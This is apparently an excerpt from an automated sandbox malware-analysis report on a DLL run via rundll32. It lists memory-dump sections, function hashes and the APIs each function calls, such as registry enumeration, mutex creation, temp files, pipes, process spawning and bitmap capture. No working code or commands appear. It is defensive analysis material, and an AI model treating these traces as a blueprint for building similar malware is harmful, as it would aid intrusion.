    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressCommandLibraryLineLoadProc$ArgvFreeLocal
    • String ID:
    • API String ID: 1914251671-0
    • Opcode ID: 05b860a98461b70195d5c2b97518a6ca621709cc4def6e7b24c632f463f08a3e
    • Instruction ID: e48b50eec5357af9a703a07c7079bfa9f97defd198ccc0c20c8938f69252fb8d
    • Opcode Fuzzy Hash: 05b860a98461b70195d5c2b97518a6ca621709cc4def6e7b24c632f463f08a3e
    • Instruction Fuzzy Hash: 8A41E13291CE46C5E750DB52E89436D73B8FB84764F101179E98D466B9DF7CE884CB01

    Control-flow Graph

    control_flow_graph 743 7ffe115049d4-7ffe115049da 744 7ffe115049de-7ffe11504a2b RegEnumKeyExW 743->744 745 7ffe11504cf1-7ffe11504d79 call 7ffe1150d290 call 7ffe11507e50 * 5 RegCloseKey call 7ffe11507e50 call 7ffe11509540 744->745 746 7ffe11504a31-7ffe11504a5c RegOpenKeyExW 744->746 748 7ffe11504cec 746->748 749 7ffe11504a62-7ffe11504a9c RegQueryValueExW 746->749 751 7ffe11504aa2-7ffe11504ad2 call 7ffe11506890 749->751 752 7ffe11504ce1-7ffe11504ce6 RegCloseKey 749->752 758 7ffe11504ad4-7ffe11504ade 751->758 759 7ffe11504b31-7ffe11504b6b RegQueryValueExW 751->759 752->748 763 7ffe11504af6-7ffe11504b2c call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 758->763 764 7ffe11504ae0-7ffe11504ae5 758->764 760 7ffe11504b6d-7ffe11504b9d call 7ffe11506890 759->760 761 7ffe11504beb-7ffe11504bff call 7ffe1150d120 759->761 775 7ffe11504be9 760->775 776 7ffe11504b9f-7ffe11504be4 call 7ffe1150d120 call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 760->776 778 7ffe11504c09-7ffe11504c43 RegQueryValueExW 761->778 779 7ffe11504c04 call 7ffe1150d120 761->779 763->759 764->763 767 7ffe11504ae7-7ffe11504af1 call 7ffe1150d120 764->767 767->763 775->778 776->775 781 7ffe11504c45-7ffe11504c75 call 7ffe11506890 778->781 782 7ffe11504cc3-7ffe11504cd7 call 7ffe1150d120 778->782 779->778 797 7ffe11504c77-7ffe11504cbc call 7ffe1150d120 call 7ffe1150d290 call 7ffe115011e0 call 7ffe1150d120 call 7ffe11506980 781->797 798 7ffe11504cc1 781->798 782->752 801 7ffe11504cdc call 7ffe1150d120 782->801 797->798 798->752 801->752
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: QueryValue$ByteCharCloseMultiWide$EnumOpen
    • String ID:
    • API String ID: 1690686292-0
    • Opcode ID: a0e63b19bc7910238b358a06483358d207d4f0b4b68c84cd2e029b785d97e623
    • Instruction ID: b21608b6ebc04d76040bbed922edeb6cf8bd14e9ba285dcd09895736a379e2b5
    • Opcode Fuzzy Hash: a0e63b19bc7910238b358a06483358d207d4f0b4b68c84cd2e029b785d97e623
    • Instruction Fuzzy Hash: 8C71F63260CA8182E720DB96E4807AFB7A8FBC5794F100179EA8D43A79DFBDD544CB40

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressGlobalHandleMemoryModuleProcStatus
    • String ID: @
    • API String ID: 2450578220-2766056989
    • Opcode ID: 5a9844992750ecd458e2b383ff26373545e98ae454aa3d0bdf05184a909415dd
    • Instruction ID: 6e895802555e263cb2a6838d5720bccaf757e83a806f04f3f9a29b6184a65c31
    • Opcode Fuzzy Hash: 5a9844992750ecd458e2b383ff26373545e98ae454aa3d0bdf05184a909415dd
    • Instruction Fuzzy Hash: 4311FE32618E8186E760DB62F85536EB7A4FBC8754F400179FACD42679DF7CD4448B00

    Control-flow Graph

    APIs
    • SetLastError.KERNEL32 ref: 00007FFE1150503A
    • CreateMutexW.KERNELBASE ref: 00007FFE11505049
    • GetLastError.KERNEL32 ref: 00007FFE1150505C
    • CloseHandle.KERNEL32 ref: 00007FFE115050B7
      • Part of subcall function 00007FFE11509260: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE115092B5
      • Part of subcall function 00007FFE11509260: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE115092F3
      • Part of subcall function 00007FFE11509260: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150932A
      • Part of subcall function 00007FFE11509260: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE11509368
      • Part of subcall function 00007FFE11509260: GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150937F
      • Part of subcall function 00007FFE11509260: CommandLineToArgvW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11509490), ref: 00007FFE1150938D
      • Part of subcall function 00007FFE11509260: LocalFree.KERNEL32 ref: 00007FFE115093F2
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressCommandErrorLastLibraryLineLoadProc$ArgvCloseCreateFreeHandleLocalMutex
    • String ID:
    • API String ID: 1743422195-0
    • Opcode ID: 583719332c49e15a3f9299204943d45c8ddca9c3a94468d76afc3e38b5f171f5
    • Instruction ID: e0ee7b3fca2dd34c81964f06cc7a24f0e70bbd962bce8e0556447650e419066d
    • Opcode Fuzzy Hash: 583719332c49e15a3f9299204943d45c8ddca9c3a94468d76afc3e38b5f171f5
    • Instruction Fuzzy Hash: 3411FE3292CE4282E720EB62E45437E6379FB847A8F4005B9E98E42675DF3CD5448B41

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: dllmain_raw
    • String ID:
    • API String ID: 3813456430-0
    • Opcode ID: e3c5f061e975df4a223fc143aaab9d369895142f65f0d891aebea7ace007555a
    • Instruction ID: 623281d67ac815f7a3d39c2ad1c4e0c9e525b4900c27dd2adbc5fabb58146eb3
    • Opcode Fuzzy Hash: e3c5f061e975df4a223fc143aaab9d369895142f65f0d891aebea7ace007555a
    • Instruction Fuzzy Hash: 81318D21F0CE4242FB5096AB448017E65E95FC5BE0B1840BCED0D837BAFFBCE9428244
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressLibraryLoadPathProcTemp
    • String ID:
    • API String ID: 1686214323-0
    • Opcode ID: adb6b4d00b339c251d18baf7af4e288d6304fd83c2c02fd41bcd5d8de635a0e1
    • Instruction ID: 495d9e6f2be3ed3b76d4e0d096fd5b6dddd8727e88f27c3485e00ccc910244dd
    • Opcode Fuzzy Hash: adb6b4d00b339c251d18baf7af4e288d6304fd83c2c02fd41bcd5d8de635a0e1
    • Instruction Fuzzy Hash: B9213B3691DE81C5E760DB62E89437A73B8FB84764F4001B9EA8D466B4DF3CE444CB01
    APIs
    • GetLastError.KERNEL32(?,?,?,00007FFE1150F235,?,?,?,?,00007FFE1150E5BF,?,?,00000000,00007FFE1150F9C5,?,?,?), ref: 00007FFE1150FA2F
    • SetLastError.KERNEL32(?,?,?,00007FFE1150F235,?,?,?,?,00007FFE1150E5BF,?,?,00000000,00007FFE1150F9C5,?,?,?), ref: 00007FFE1150FA99
    • SetLastError.KERNEL32(?,?,?,00007FFE1150F235,?,?,?,?,00007FFE1150E5BF,?,?,00000000,00007FFE1150F9C5,?,?,?), ref: 00007FFE1150FAA3
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 79c5636aeb9a70195001eef8bfab838ba4450b33627de5dca7391d2d6ea7290f
    • Instruction ID: b8545d4320e999c04060333b7ed065723d9ade43653efe54ef95ca46b74ccfe7
    • Opcode Fuzzy Hash: 79c5636aeb9a70195001eef8bfab838ba4450b33627de5dca7391d2d6ea7290f
    • Instruction Fuzzy Hash: 1F118E20F09E5283FB5AA7A3555413C62AE9F447F0F1005BED91E037F6EE6CE8418301
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ChangeCloseCreateFindNotificationThread
    • String ID:
    • API String ID: 4060959955-0
    • Opcode ID: 71b8b0b6f66aa09b918a2002ed21724a191b18b371f1758d3ade0c485f45f7bd
    • Instruction ID: 8c7d03f4ea30bde69283846a5d5c56b7732b5d2d681d90242cc7e2cf2dddef5c
    • Opcode Fuzzy Hash: 71b8b0b6f66aa09b918a2002ed21724a191b18b371f1758d3ade0c485f45f7bd
    • Instruction Fuzzy Hash: D6F01472918B818AD350CF52E48835EBBA4FB883A4F500479FA8A42B78DF7CC484CB40
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Heap$AllocateProcess
    • String ID:
    • API String ID: 1357844191-0
    • Opcode ID: 9329e4d84ccb99430093e794eead5b662097cfe0c186392e508571b5f5f7c090
    • Instruction ID: 773beb871a3079482184e336c4a3abbd712044a7542898004f5ae4519fd9e652
    • Opcode Fuzzy Hash: 9329e4d84ccb99430093e794eead5b662097cfe0c186392e508571b5f5f7c090
    • Instruction Fuzzy Hash: 6EC01264E25A4182DB046B62A4491596775FB89750F504078D98902734DD3CC0998B00
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID:
    • API String ID: 3215553584-0
    • Opcode ID: ad834de6681e54c79edc797017fbf8dae2ed4ae770d08526102acd3bb7e72e1a
    • Instruction ID: 59d96bc363c74d8327a0620811770adfa735cb3338bb0b7939df8c974616f4ff
    • Opcode Fuzzy Hash: ad834de6681e54c79edc797017fbf8dae2ed4ae770d08526102acd3bb7e72e1a
    • Instruction Fuzzy Hash: 58115E32A2CF42D6F3119B92A44123D76AAFB413A8F6800B5EA8D477B1DF3CF9008700
    APIs
    • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFE1150F9C5,?,?,?,00007FFE1150BB84,?,?,?,00007FFE1150CC91), ref: 00007FFE1150E5AD
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 9d202d867305b54c680245dbf04660641440753b6715bf975ef5052a3991603a
    • Instruction ID: 2db8398375ac1a7fe4690c4f7c9cb5e59645299b064c934165a107bbc7c99bd8
    • Opcode Fuzzy Hash: 9d202d867305b54c680245dbf04660641440753b6715bf975ef5052a3991603a
    • Instruction Fuzzy Hash: 32F06D44B09E1341FF5597F369212BD128E9F89BB0F2C58B9C80E863F2FE1DE4809210
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Sleep
    • String ID:
    • API String ID: 3472027048-0
    • Opcode ID: fe412710fa9a1c2aba127212d301d3a02b7c2680fcf65a97a709af9942d7cfd2
    • Instruction ID: cad988e6647b22fc80136b654d4255fad5e019a2ef0b0aadca2b636435c17797
    • Opcode Fuzzy Hash: fe412710fa9a1c2aba127212d301d3a02b7c2680fcf65a97a709af9942d7cfd2
    • Instruction Fuzzy Hash: E7C04C51D0D943C6FB99179398D933C2169AB64321F9141FCD61D012F09F2C65D58A22
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: File$CloseHandle$Delete$Process$CreateTemp$ByteCharMultiNameWideswprintfwcscat$AddressDirectoryHeapLanguagesLibraryLoadPathPreferredProcRestoreSystemThread_vswprintf_s_lwcscpy
    • String ID: %ls "%ls"$%ls\%ls "%ls",$dat$h
    • API String ID: 654103805-3870102533
    • Opcode ID: 8b3cb215889b0d371f3da684f6cdebf913241e7f9246b566288e5101e093d20b
    • Instruction ID: 5bfeff18365a4b7eab4a10a31c8e98c43e2627b559f18617558a419dbb7442a9
    • Opcode Fuzzy Hash: 8b3cb215889b0d371f3da684f6cdebf913241e7f9246b566288e5101e093d20b
    • Instruction Fuzzy Hash: E8F10632A1CE8285E760DB62E4547AFB3A9FBC5764F40407AD68D42AB9DF3CD548CB40
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: AddressProc$Object$CompatibleCreateDeleteLibraryLoadMetricsSystem$BitmapReleaseSelect
    • String ID:
    • API String ID: 1533257422-3916222277
    • Opcode ID: 4baea973d72330b54929f1745f4d6fd4273bb32029f5c8a4967c10ab87e99a1e
    • Instruction ID: c3e25ae1390aa10cab52ba181b76ae744336b63918ddce8ac9c8179a51cc1dca
    • Opcode Fuzzy Hash: 4baea973d72330b54929f1745f4d6fd4273bb32029f5c8a4967c10ab87e99a1e
    • Instruction Fuzzy Hash: A3B1C73290DF86C5E760ABA6F85436A73A9FB84764F0000B9D98D93675DF7CE488CB01
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: Handle$Close$ByteCharCurrentDirectoryMultiProcessWide$CreateHeapPipe$AllocateFileInformationNamedObjectPeekReadSingleSleepTerminateWait_vswprintf_s_lswprintf
    • String ID: $$2$h
    • API String ID: 3838355756-1214087042
    • Opcode ID: 59938e374b416ba04519ddff59002b1483effda1c76f174347341531ffb64343
    • Instruction ID: 8678da5d2f6eac6f776046c8e1fb644484ef45b6360f1e12140913950971e542
    • Opcode Fuzzy Hash: 59938e374b416ba04519ddff59002b1483effda1c76f174347341531ffb64343
    • Instruction Fuzzy Hash: FB02F732608AC186E760DB56E4543AEB7A5FBC47A4F004179EA8D43BB9DF7CD489CB40
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
    • API String ID: 281475176-2761157908
    • Opcode ID: c0f935cb567f563a433567c347b6aa22b70d71aea3869bc0075b4a5acf723f8a
    • Instruction ID: 7ae0264016fedb8d51f03d6bcbcffe8b4a980bc37eb46c84cad40eb5ecdc378b
    • Opcode Fuzzy Hash: c0f935cb567f563a433567c347b6aa22b70d71aea3869bc0075b4a5acf723f8a
    • Instruction Fuzzy Hash: E8B21B72A089828BE7668E66D4407FD3BAAFB443ACF506135DA0957BB5DF3CE504CB00
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
    • String ID:
    • API String ID: 1239891234-0
    • Opcode ID: 96d1b2251808390a899ca332325b000b59ea61d1b8f112abec86d48cf742ac05
    • Instruction ID: dd351527d510806296985be7e505bc077d05956019e0c7c58cd6712a7226818b
    • Opcode Fuzzy Hash: 96d1b2251808390a899ca332325b000b59ea61d1b8f112abec86d48cf742ac05
    • Instruction Fuzzy Hash: 91315F36618F8186EB61CF66E8442AE73A8FB84764F540179EA9D43BB4EF3CC545CB00
    APIs
    • _invalid_parameter_noinfo.LIBCMT ref: 00007FFE11511434
      • Part of subcall function 00007FFE1150EEFC: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFE1150EEDA), ref: 00007FFE1150EF05
      • Part of subcall function 00007FFE1150EEFC: GetCurrentProcess.KERNEL32(?,?,?,?,00007FFE1150EEDA), ref: 00007FFE1150EF29
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
    • String ID: *?$.
    • API String ID: 4036615347-3972193922
    • Opcode ID: eba59fe5f0c93d1134c9cc44fef27bef4db73f0af7df213452137592245963f0
    • Instruction ID: cf0ee9f23ab558ef7455463922a729bc26fc2f30fb62863ce89ba980e0ff3713
    • Opcode Fuzzy Hash: eba59fe5f0c93d1134c9cc44fef27bef4db73f0af7df213452137592245963f0
    • Instruction Fuzzy Hash: 24510222B14E9585EF12CFB398404BC73AAFB48BE8B454575DE1E17BA5EE3CD0428300
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: memcpy_s
    • String ID:
    • API String ID: 1502251526-0
